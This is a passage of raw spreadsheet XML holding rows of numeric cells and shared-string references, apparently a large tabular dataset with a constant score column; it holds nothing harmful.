        <v>4.1420065E7</v>
      </c>
      <c r="C21642" s="2" t="s">
        <v>20893</v>
      </c>
      <c r="D21642" s="2">
        <v>1.0</v>
      </c>
      <c r="E21642" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21642" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21643" ht="15.75" customHeight="1">
      <c r="A21643" s="1">
        <v>4197.0</v>
      </c>
      <c r="B21643" s="2">
        <v>4.1626973E7</v>
      </c>
      <c r="C21643" s="2" t="s">
        <v>20894</v>
      </c>
      <c r="D21643" s="2">
        <v>1.0</v>
      </c>
      <c r="E21643" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21643" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21644" ht="15.75" customHeight="1">
      <c r="A21644" s="1">
        <v>4310.0</v>
      </c>
      <c r="B21644" s="2">
        <v>4.1984034E7</v>
      </c>
      <c r="C21644" s="2" t="s">
        <v>20895</v>
      </c>
      <c r="D21644" s="2">
        <v>1.0</v>
      </c>
      <c r="E21644" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21644" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21645" ht="15.75" customHeight="1">
      <c r="A21645" s="1">
        <v>4391.0</v>
      </c>
      <c r="B21645" s="2">
        <v>4.2227081E7</v>
      </c>
      <c r="C21645" s="2" t="s">
        <v>20896</v>
      </c>
      <c r="D21645" s="2">
        <v>1.0</v>
      </c>
      <c r="E21645" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21645" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21646" ht="15.75" customHeight="1">
      <c r="A21646" s="1">
        <v>4466.0</v>
      </c>
      <c r="B21646" s="2">
        <v>4.2462632E7</v>
      </c>
      <c r="C21646" s="2" t="s">
        <v>20897</v>
      </c>
      <c r="D21646" s="2">
        <v>1.0</v>
      </c>
      <c r="E21646" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21646" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21647" ht="15.75" customHeight="1">
      <c r="A21647" s="1">
        <v>4621.0</v>
      </c>
      <c r="B21647" s="2">
        <v>4.297373E7</v>
      </c>
      <c r="C21647" s="2" t="s">
        <v>20898</v>
      </c>
      <c r="D21647" s="2">
        <v>1.0</v>
      </c>
      <c r="E21647" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21647" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21648" ht="15.75" customHeight="1">
      <c r="A21648" s="1">
        <v>4718.0</v>
      </c>
      <c r="B21648" s="2">
        <v>4.330215E7</v>
      </c>
      <c r="C21648" s="2" t="s">
        <v>20899</v>
      </c>
      <c r="D21648" s="2">
        <v>1.0</v>
      </c>
      <c r="E21648" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21648" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21649" ht="15.75" customHeight="1">
      <c r="A21649" s="1">
        <v>4735.0</v>
      </c>
      <c r="B21649" s="2">
        <v>4.3342149E7</v>
      </c>
      <c r="C21649" s="2" t="s">
        <v>20900</v>
      </c>
      <c r="D21649" s="2">
        <v>1.0</v>
      </c>
      <c r="E21649" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21649" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21650" ht="15.75" customHeight="1">
      <c r="A21650" s="1">
        <v>4767.0</v>
      </c>
      <c r="B21650" s="2">
        <v>4.3432772E7</v>
      </c>
      <c r="C21650" s="2" t="s">
        <v>20901</v>
      </c>
      <c r="D21650" s="2">
        <v>1.0</v>
      </c>
      <c r="E21650" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21650" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21651" ht="15.75" customHeight="1">
      <c r="A21651" s="1">
        <v>4791.0</v>
      </c>
      <c r="B21651" s="2">
        <v>4.3497051E7</v>
      </c>
      <c r="C21651" s="2" t="s">
        <v>20902</v>
      </c>
      <c r="D21651" s="2">
        <v>1.0</v>
      </c>
      <c r="E21651" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21651" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21652" ht="15.75" customHeight="1">
      <c r="A21652" s="1">
        <v>4793.0</v>
      </c>
      <c r="B21652" s="2">
        <v>4.3501641E7</v>
      </c>
      <c r="C21652" s="2" t="s">
        <v>20903</v>
      </c>
      <c r="D21652" s="2">
        <v>1.0</v>
      </c>
      <c r="E21652" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21652" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21653" ht="15.75" customHeight="1">
      <c r="A21653" s="1">
        <v>4816.0</v>
      </c>
      <c r="B21653" s="2">
        <v>4.360255E7</v>
      </c>
      <c r="C21653" s="2" t="s">
        <v>20904</v>
      </c>
      <c r="D21653" s="2">
        <v>1.0</v>
      </c>
      <c r="E21653" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21653" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21654" ht="15.75" customHeight="1">
      <c r="A21654" s="1">
        <v>4976.0</v>
      </c>
      <c r="B21654" s="2">
        <v>4.4113956E7</v>
      </c>
      <c r="C21654" s="2" t="s">
        <v>20905</v>
      </c>
      <c r="D21654" s="2">
        <v>1.0</v>
      </c>
      <c r="E21654" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21654" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21655" ht="15.75" customHeight="1">
      <c r="A21655" s="1">
        <v>4977.0</v>
      </c>
      <c r="B21655" s="2">
        <v>4.4113956E7</v>
      </c>
      <c r="C21655" s="2" t="s">
        <v>20906</v>
      </c>
      <c r="D21655" s="2">
        <v>1.0</v>
      </c>
      <c r="E21655" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21655" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21656" ht="15.75" customHeight="1">
      <c r="A21656" s="1">
        <v>4978.0</v>
      </c>
      <c r="B21656" s="2">
        <v>4.4113956E7</v>
      </c>
      <c r="C21656" s="2" t="s">
        <v>20907</v>
      </c>
      <c r="D21656" s="2">
        <v>1.0</v>
      </c>
      <c r="E21656" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21656" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21657" ht="15.75" customHeight="1">
      <c r="A21657" s="1">
        <v>5004.0</v>
      </c>
      <c r="B21657" s="2">
        <v>4.4181821E7</v>
      </c>
      <c r="C21657" s="2" t="s">
        <v>20908</v>
      </c>
      <c r="D21657" s="2">
        <v>1.0</v>
      </c>
      <c r="E21657" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21657" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21658" ht="15.75" customHeight="1">
      <c r="A21658" s="1">
        <v>5196.0</v>
      </c>
      <c r="B21658" s="2">
        <v>4.483646E7</v>
      </c>
      <c r="C21658" s="2" t="s">
        <v>20909</v>
      </c>
      <c r="D21658" s="2">
        <v>1.0</v>
      </c>
      <c r="E21658" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21658" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21659" ht="15.75" customHeight="1">
      <c r="A21659" s="1">
        <v>5459.0</v>
      </c>
      <c r="B21659" s="2">
        <v>4.5659874E7</v>
      </c>
      <c r="C21659" s="2" t="s">
        <v>20910</v>
      </c>
      <c r="D21659" s="2">
        <v>1.0</v>
      </c>
      <c r="E21659" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21659" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21660" ht="15.75" customHeight="1">
      <c r="A21660" s="1">
        <v>5534.0</v>
      </c>
      <c r="B21660" s="2">
        <v>4.5894412E7</v>
      </c>
      <c r="C21660" s="2" t="s">
        <v>20911</v>
      </c>
      <c r="D21660" s="2">
        <v>1.0</v>
      </c>
      <c r="E21660" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21660" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21661" ht="15.75" customHeight="1">
      <c r="A21661" s="1">
        <v>5594.0</v>
      </c>
      <c r="B21661" s="2">
        <v>4.6123243E7</v>
      </c>
      <c r="C21661" s="2" t="s">
        <v>20912</v>
      </c>
      <c r="D21661" s="2">
        <v>1.0</v>
      </c>
      <c r="E21661" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21661" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21662" ht="15.75" customHeight="1">
      <c r="A21662" s="1">
        <v>5615.0</v>
      </c>
      <c r="B21662" s="2">
        <v>4.6177594E7</v>
      </c>
      <c r="C21662" s="2" t="s">
        <v>20913</v>
      </c>
      <c r="D21662" s="2">
        <v>1.0</v>
      </c>
      <c r="E21662" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21662" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21663" ht="15.75" customHeight="1">
      <c r="A21663" s="1">
        <v>5617.0</v>
      </c>
      <c r="B21663" s="2">
        <v>4.6177594E7</v>
      </c>
      <c r="C21663" s="2" t="s">
        <v>20914</v>
      </c>
      <c r="D21663" s="2">
        <v>1.0</v>
      </c>
      <c r="E21663" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21663" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21664" ht="15.75" customHeight="1">
      <c r="A21664" s="1">
        <v>5626.0</v>
      </c>
      <c r="B21664" s="2">
        <v>4.6198055E7</v>
      </c>
      <c r="C21664" s="2" t="s">
        <v>20915</v>
      </c>
      <c r="D21664" s="2">
        <v>1.0</v>
      </c>
      <c r="E21664" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21664" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21665" ht="15.75" customHeight="1">
      <c r="A21665" s="1">
        <v>5793.0</v>
      </c>
      <c r="B21665" s="2">
        <v>4.6784659E7</v>
      </c>
      <c r="C21665" s="2" t="s">
        <v>20916</v>
      </c>
      <c r="D21665" s="2">
        <v>1.0</v>
      </c>
      <c r="E21665" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21665" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21666" ht="15.75" customHeight="1">
      <c r="A21666" s="1">
        <v>5795.0</v>
      </c>
      <c r="B21666" s="2">
        <v>4.6784659E7</v>
      </c>
      <c r="C21666" s="2" t="s">
        <v>20917</v>
      </c>
      <c r="D21666" s="2">
        <v>1.0</v>
      </c>
      <c r="E21666" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21666" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21667" ht="15.75" customHeight="1">
      <c r="A21667" s="1">
        <v>5860.0</v>
      </c>
      <c r="B21667" s="2">
        <v>4.6954391E7</v>
      </c>
      <c r="C21667" s="2" t="s">
        <v>20918</v>
      </c>
      <c r="D21667" s="2">
        <v>1.0</v>
      </c>
      <c r="E21667" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21667" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21668" ht="15.75" customHeight="1">
      <c r="A21668" s="1">
        <v>5904.0</v>
      </c>
      <c r="B21668" s="2">
        <v>4.7187893E7</v>
      </c>
      <c r="C21668" s="2" t="s">
        <v>20919</v>
      </c>
      <c r="D21668" s="2">
        <v>1.0</v>
      </c>
      <c r="E21668" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21668" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21669" ht="15.75" customHeight="1">
      <c r="A21669" s="1">
        <v>5920.0</v>
      </c>
      <c r="B21669" s="2">
        <v>4.7218636E7</v>
      </c>
      <c r="C21669" s="2" t="s">
        <v>20920</v>
      </c>
      <c r="D21669" s="2">
        <v>1.0</v>
      </c>
      <c r="E21669" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21669" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21670" ht="15.75" customHeight="1">
      <c r="A21670" s="1">
        <v>5966.0</v>
      </c>
      <c r="B21670" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C21670" s="2" t="s">
        <v>20921</v>
      </c>
      <c r="D21670" s="2">
        <v>1.0</v>
      </c>
      <c r="E21670" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21670" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21671" ht="15.75" customHeight="1">
      <c r="A21671" s="1">
        <v>5993.0</v>
      </c>
      <c r="B21671" s="2">
        <v>4.743396E7</v>
      </c>
      <c r="C21671" s="2" t="s">
        <v>20922</v>
      </c>
      <c r="D21671" s="2">
        <v>1.0</v>
      </c>
      <c r="E21671" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21671" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21672" ht="15.75" customHeight="1">
      <c r="A21672" s="1">
        <v>6190.0</v>
      </c>
      <c r="B21672" s="2">
        <v>4.7913547E7</v>
      </c>
      <c r="C21672" s="2" t="s">
        <v>20923</v>
      </c>
      <c r="D21672" s="2">
        <v>1.0</v>
      </c>
      <c r="E21672" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21672" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21673" ht="15.75" customHeight="1">
      <c r="A21673" s="1">
        <v>6230.0</v>
      </c>
      <c r="B21673" s="2">
        <v>4.8063246E7</v>
      </c>
      <c r="C21673" s="2" t="s">
        <v>20924</v>
      </c>
      <c r="D21673" s="2">
        <v>1.0</v>
      </c>
      <c r="E21673" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21673" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21674" ht="15.75" customHeight="1">
      <c r="A21674" s="1">
        <v>6355.0</v>
      </c>
      <c r="B21674" s="2">
        <v>4.8321522E7</v>
      </c>
      <c r="C21674" s="2" t="s">
        <v>20925</v>
      </c>
      <c r="D21674" s="2">
        <v>1.0</v>
      </c>
      <c r="E21674" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21674" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21675" ht="15.75" customHeight="1">
      <c r="A21675" s="1">
        <v>6610.0</v>
      </c>
      <c r="B21675" s="2">
        <v>4.9019926E7</v>
      </c>
      <c r="C21675" s="2" t="s">
        <v>20926</v>
      </c>
      <c r="D21675" s="2">
        <v>1.0</v>
      </c>
      <c r="E21675" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21675" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21676" ht="15.75" customHeight="1">
      <c r="A21676" s="1">
        <v>6626.0</v>
      </c>
      <c r="B21676" s="2">
        <v>4.9059703E7</v>
      </c>
      <c r="C21676" s="2" t="s">
        <v>20927</v>
      </c>
      <c r="D21676" s="2">
        <v>1.0</v>
      </c>
      <c r="E21676" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21676" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21677" ht="15.75" customHeight="1">
      <c r="A21677" s="1">
        <v>6844.0</v>
      </c>
      <c r="B21677" s="2">
        <v>4.9622755E7</v>
      </c>
      <c r="C21677" s="2" t="s">
        <v>20928</v>
      </c>
      <c r="D21677" s="2">
        <v>1.0</v>
      </c>
      <c r="E21677" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21677" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21678" ht="15.75" customHeight="1">
      <c r="A21678" s="1">
        <v>6898.0</v>
      </c>
      <c r="B21678" s="2">
        <v>4.980273E7</v>
      </c>
      <c r="C21678" s="2" t="s">
        <v>20929</v>
      </c>
      <c r="D21678" s="2">
        <v>1.0</v>
      </c>
      <c r="E21678" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21678" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21679" ht="15.75" customHeight="1">
      <c r="A21679" s="1">
        <v>7125.0</v>
      </c>
      <c r="B21679" s="2">
        <v>5.0420678E7</v>
      </c>
      <c r="C21679" s="2" t="s">
        <v>20930</v>
      </c>
      <c r="D21679" s="2">
        <v>1.0</v>
      </c>
      <c r="E21679" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21679" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21680" ht="15.75" customHeight="1">
      <c r="A21680" s="1">
        <v>7178.0</v>
      </c>
      <c r="B21680" s="2">
        <v>5.0560502E7</v>
      </c>
      <c r="C21680" s="2" t="s">
        <v>20931</v>
      </c>
      <c r="D21680" s="2">
        <v>1.0</v>
      </c>
      <c r="E21680" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21680" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21681" ht="15.75" customHeight="1">
      <c r="A21681" s="1">
        <v>7703.0</v>
      </c>
      <c r="B21681" s="2">
        <v>5.1984858E7</v>
      </c>
      <c r="C21681" s="2" t="s">
        <v>20932</v>
      </c>
      <c r="D21681" s="2">
        <v>1.0</v>
      </c>
      <c r="E21681" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21681" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21682" ht="15.75" customHeight="1">
      <c r="A21682" s="1">
        <v>8029.0</v>
      </c>
      <c r="B21682" s="2">
        <v>5.2820344E7</v>
      </c>
      <c r="C21682" s="2" t="s">
        <v>20933</v>
      </c>
      <c r="D21682" s="2">
        <v>1.0</v>
      </c>
      <c r="E21682" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21682" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21683" ht="15.75" customHeight="1">
      <c r="A21683" s="1">
        <v>8038.0</v>
      </c>
      <c r="B21683" s="2">
        <v>5.2833977E7</v>
      </c>
      <c r="C21683" s="2" t="s">
        <v>20934</v>
      </c>
      <c r="D21683" s="2">
        <v>1.0</v>
      </c>
      <c r="E21683" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21683" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21684" ht="15.75" customHeight="1">
      <c r="A21684" s="1">
        <v>8292.0</v>
      </c>
      <c r="B21684" s="2">
        <v>5.3527506E7</v>
      </c>
      <c r="C21684" s="2" t="s">
        <v>20935</v>
      </c>
      <c r="D21684" s="2">
        <v>1.0</v>
      </c>
      <c r="E21684" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21684" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21685" ht="15.75" customHeight="1">
      <c r="A21685" s="1">
        <v>8554.0</v>
      </c>
      <c r="B21685" s="2">
        <v>5.41612E7</v>
      </c>
      <c r="C21685" s="2" t="s">
        <v>20936</v>
      </c>
      <c r="D21685" s="2">
        <v>1.0</v>
      </c>
      <c r="E21685" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21685" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21686" ht="15.75" customHeight="1">
      <c r="A21686" s="1">
        <v>8594.0</v>
      </c>
      <c r="B21686" s="2">
        <v>5.4245181E7</v>
      </c>
      <c r="C21686" s="2" t="s">
        <v>20937</v>
      </c>
      <c r="D21686" s="2">
        <v>1.0</v>
      </c>
      <c r="E21686" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21686" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21687" ht="15.75" customHeight="1">
      <c r="A21687" s="1">
        <v>8663.0</v>
      </c>
      <c r="B21687" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C21687" s="2" t="s">
        <v>20938</v>
      </c>
      <c r="D21687" s="2">
        <v>1.0</v>
      </c>
      <c r="E21687" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21687" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21688" ht="15.75" customHeight="1">
      <c r="A21688" s="1">
        <v>8789.0</v>
      </c>
      <c r="B21688" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C21688" s="2" t="s">
        <v>20939</v>
      </c>
      <c r="D21688" s="2">
        <v>1.0</v>
      </c>
      <c r="E21688" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21688" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21689" ht="15.75" customHeight="1">
      <c r="A21689" s="1">
        <v>8865.0</v>
      </c>
      <c r="B21689" s="2">
        <v>5.4743538E7</v>
      </c>
      <c r="C21689" s="2" t="s">
        <v>20940</v>
      </c>
      <c r="D21689" s="2">
        <v>1.0</v>
      </c>
      <c r="E21689" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21689" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21690" ht="15.75" customHeight="1">
      <c r="A21690" s="1">
        <v>9032.0</v>
      </c>
      <c r="B21690" s="2">
        <v>5.5042958E7</v>
      </c>
      <c r="C21690" s="2" t="s">
        <v>20941</v>
      </c>
      <c r="D21690" s="2">
        <v>1.0</v>
      </c>
      <c r="E21690" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21690" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21691" ht="15.75" customHeight="1">
      <c r="A21691" s="1">
        <v>9170.0</v>
      </c>
      <c r="B21691" s="2">
        <v>5.5336854E7</v>
      </c>
      <c r="C21691" s="2" t="s">
        <v>20942</v>
      </c>
      <c r="D21691" s="2">
        <v>1.0</v>
      </c>
      <c r="E21691" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21691" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21692" ht="15.75" customHeight="1">
      <c r="A21692" s="1">
        <v>9211.0</v>
      </c>
      <c r="B21692" s="2">
        <v>5.541917E7</v>
      </c>
      <c r="C21692" s="2" t="s">
        <v>20943</v>
      </c>
      <c r="D21692" s="2">
        <v>1.0</v>
      </c>
      <c r="E21692" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21692" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21693" ht="15.75" customHeight="1">
      <c r="A21693" s="1">
        <v>9376.0</v>
      </c>
      <c r="B21693" s="2">
        <v>5.5701918E7</v>
      </c>
      <c r="C21693" s="2" t="s">
        <v>20944</v>
      </c>
      <c r="D21693" s="2">
        <v>1.0</v>
      </c>
      <c r="E21693" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21693" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21694" ht="15.75" customHeight="1">
      <c r="A21694" s="1">
        <v>9402.0</v>
      </c>
      <c r="B21694" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C21694" s="2" t="s">
        <v>20945</v>
      </c>
      <c r="D21694" s="2">
        <v>1.0</v>
      </c>
      <c r="E21694" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21694" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21695" ht="15.75" customHeight="1">
      <c r="A21695" s="1">
        <v>9435.0</v>
      </c>
      <c r="B21695" s="2">
        <v>5.5801594E7</v>
      </c>
      <c r="C21695" s="2" t="s">
        <v>20946</v>
      </c>
      <c r="D21695" s="2">
        <v>1.0</v>
      </c>
      <c r="E21695" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21695" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21696" ht="15.75" customHeight="1">
      <c r="A21696" s="1">
        <v>9486.0</v>
      </c>
      <c r="B21696" s="2">
        <v>5.5906003E7</v>
      </c>
      <c r="C21696" s="2" t="s">
        <v>20947</v>
      </c>
      <c r="D21696" s="2">
        <v>1.0</v>
      </c>
      <c r="E21696" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21696" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21697" ht="15.75" customHeight="1">
      <c r="A21697" s="1">
        <v>9727.0</v>
      </c>
      <c r="B21697" s="2">
        <v>5.6438049E7</v>
      </c>
      <c r="C21697" s="2" t="s">
        <v>20948</v>
      </c>
      <c r="D21697" s="2">
        <v>1.0</v>
      </c>
      <c r="E21697" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21697" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21698" ht="15.75" customHeight="1">
      <c r="A21698" s="1">
        <v>10062.0</v>
      </c>
      <c r="B21698" s="2">
        <v>5.7128386E7</v>
      </c>
      <c r="C21698" s="2" t="s">
        <v>20949</v>
      </c>
      <c r="D21698" s="2">
        <v>1.0</v>
      </c>
      <c r="E21698" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21698" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21699" ht="15.75" customHeight="1">
      <c r="A21699" s="1">
        <v>10080.0</v>
      </c>
      <c r="B21699" s="2">
        <v>5.7155659E7</v>
      </c>
      <c r="C21699" s="2" t="s">
        <v>20950</v>
      </c>
      <c r="D21699" s="2">
        <v>1.0</v>
      </c>
      <c r="E21699" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21699" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21700" ht="15.75" customHeight="1">
      <c r="A21700" s="1">
        <v>10304.0</v>
      </c>
      <c r="B21700" s="2">
        <v>5.7667674E7</v>
      </c>
      <c r="C21700" s="2" t="s">
        <v>20951</v>
      </c>
      <c r="D21700" s="2">
        <v>1.0</v>
      </c>
      <c r="E21700" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21700" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21701" ht="15.75" customHeight="1">
      <c r="A21701" s="1">
        <v>10511.0</v>
      </c>
      <c r="B21701" s="2">
        <v>1.1714343E7</v>
      </c>
      <c r="C21701" s="2" t="s">
        <v>20952</v>
      </c>
      <c r="D21701" s="2">
        <v>1.0</v>
      </c>
      <c r="E21701" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21701" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21702" ht="15.75" customHeight="1">
      <c r="A21702" s="1">
        <v>10545.0</v>
      </c>
      <c r="B21702" s="2">
        <v>1.2507421E7</v>
      </c>
      <c r="C21702" s="2" t="s">
        <v>20953</v>
      </c>
      <c r="D21702" s="2">
        <v>1.0</v>
      </c>
      <c r="E21702" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21702" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21703" ht="15.75" customHeight="1">
      <c r="A21703" s="1">
        <v>10595.0</v>
      </c>
      <c r="B21703" s="2">
        <v>1.3514674E7</v>
      </c>
      <c r="C21703" s="2" t="s">
        <v>20954</v>
      </c>
      <c r="D21703" s="2">
        <v>1.0</v>
      </c>
      <c r="E21703" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21703" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21704" ht="15.75" customHeight="1">
      <c r="A21704" s="1">
        <v>10846.0</v>
      </c>
      <c r="B21704" s="2">
        <v>1.6154935E7</v>
      </c>
      <c r="C21704" s="2" t="s">
        <v>20955</v>
      </c>
      <c r="D21704" s="2">
        <v>1.0</v>
      </c>
      <c r="E21704" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21704" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21705" ht="15.75" customHeight="1">
      <c r="A21705" s="1">
        <v>10925.0</v>
      </c>
      <c r="B21705" s="2">
        <v>1.6857296E7</v>
      </c>
      <c r="C21705" s="2" t="s">
        <v>20956</v>
      </c>
      <c r="D21705" s="2">
        <v>1.0</v>
      </c>
      <c r="E21705" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21705" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21706" ht="15.75" customHeight="1">
      <c r="A21706" s="1">
        <v>10969.0</v>
      </c>
      <c r="B21706" s="2">
        <v>1.7261517E7</v>
      </c>
      <c r="C21706" s="2" t="s">
        <v>20957</v>
      </c>
      <c r="D21706" s="2">
        <v>1.0</v>
      </c>
      <c r="E21706" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21706" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21707" ht="15.75" customHeight="1">
      <c r="A21707" s="1">
        <v>11010.0</v>
      </c>
      <c r="B21707" s="2">
        <v>1.7710804E7</v>
      </c>
      <c r="C21707" s="2" t="s">
        <v>20958</v>
      </c>
      <c r="D21707" s="2">
        <v>1.0</v>
      </c>
      <c r="E21707" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21707" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21708" ht="15.75" customHeight="1">
      <c r="A21708" s="1">
        <v>11308.0</v>
      </c>
      <c r="B21708" s="2">
        <v>2.1005153E7</v>
      </c>
      <c r="C21708" s="2" t="s">
        <v>20959</v>
      </c>
      <c r="D21708" s="2">
        <v>1.0</v>
      </c>
      <c r="E21708" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21708" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21709" ht="15.75" customHeight="1">
      <c r="A21709" s="1">
        <v>11418.0</v>
      </c>
      <c r="B21709" s="2">
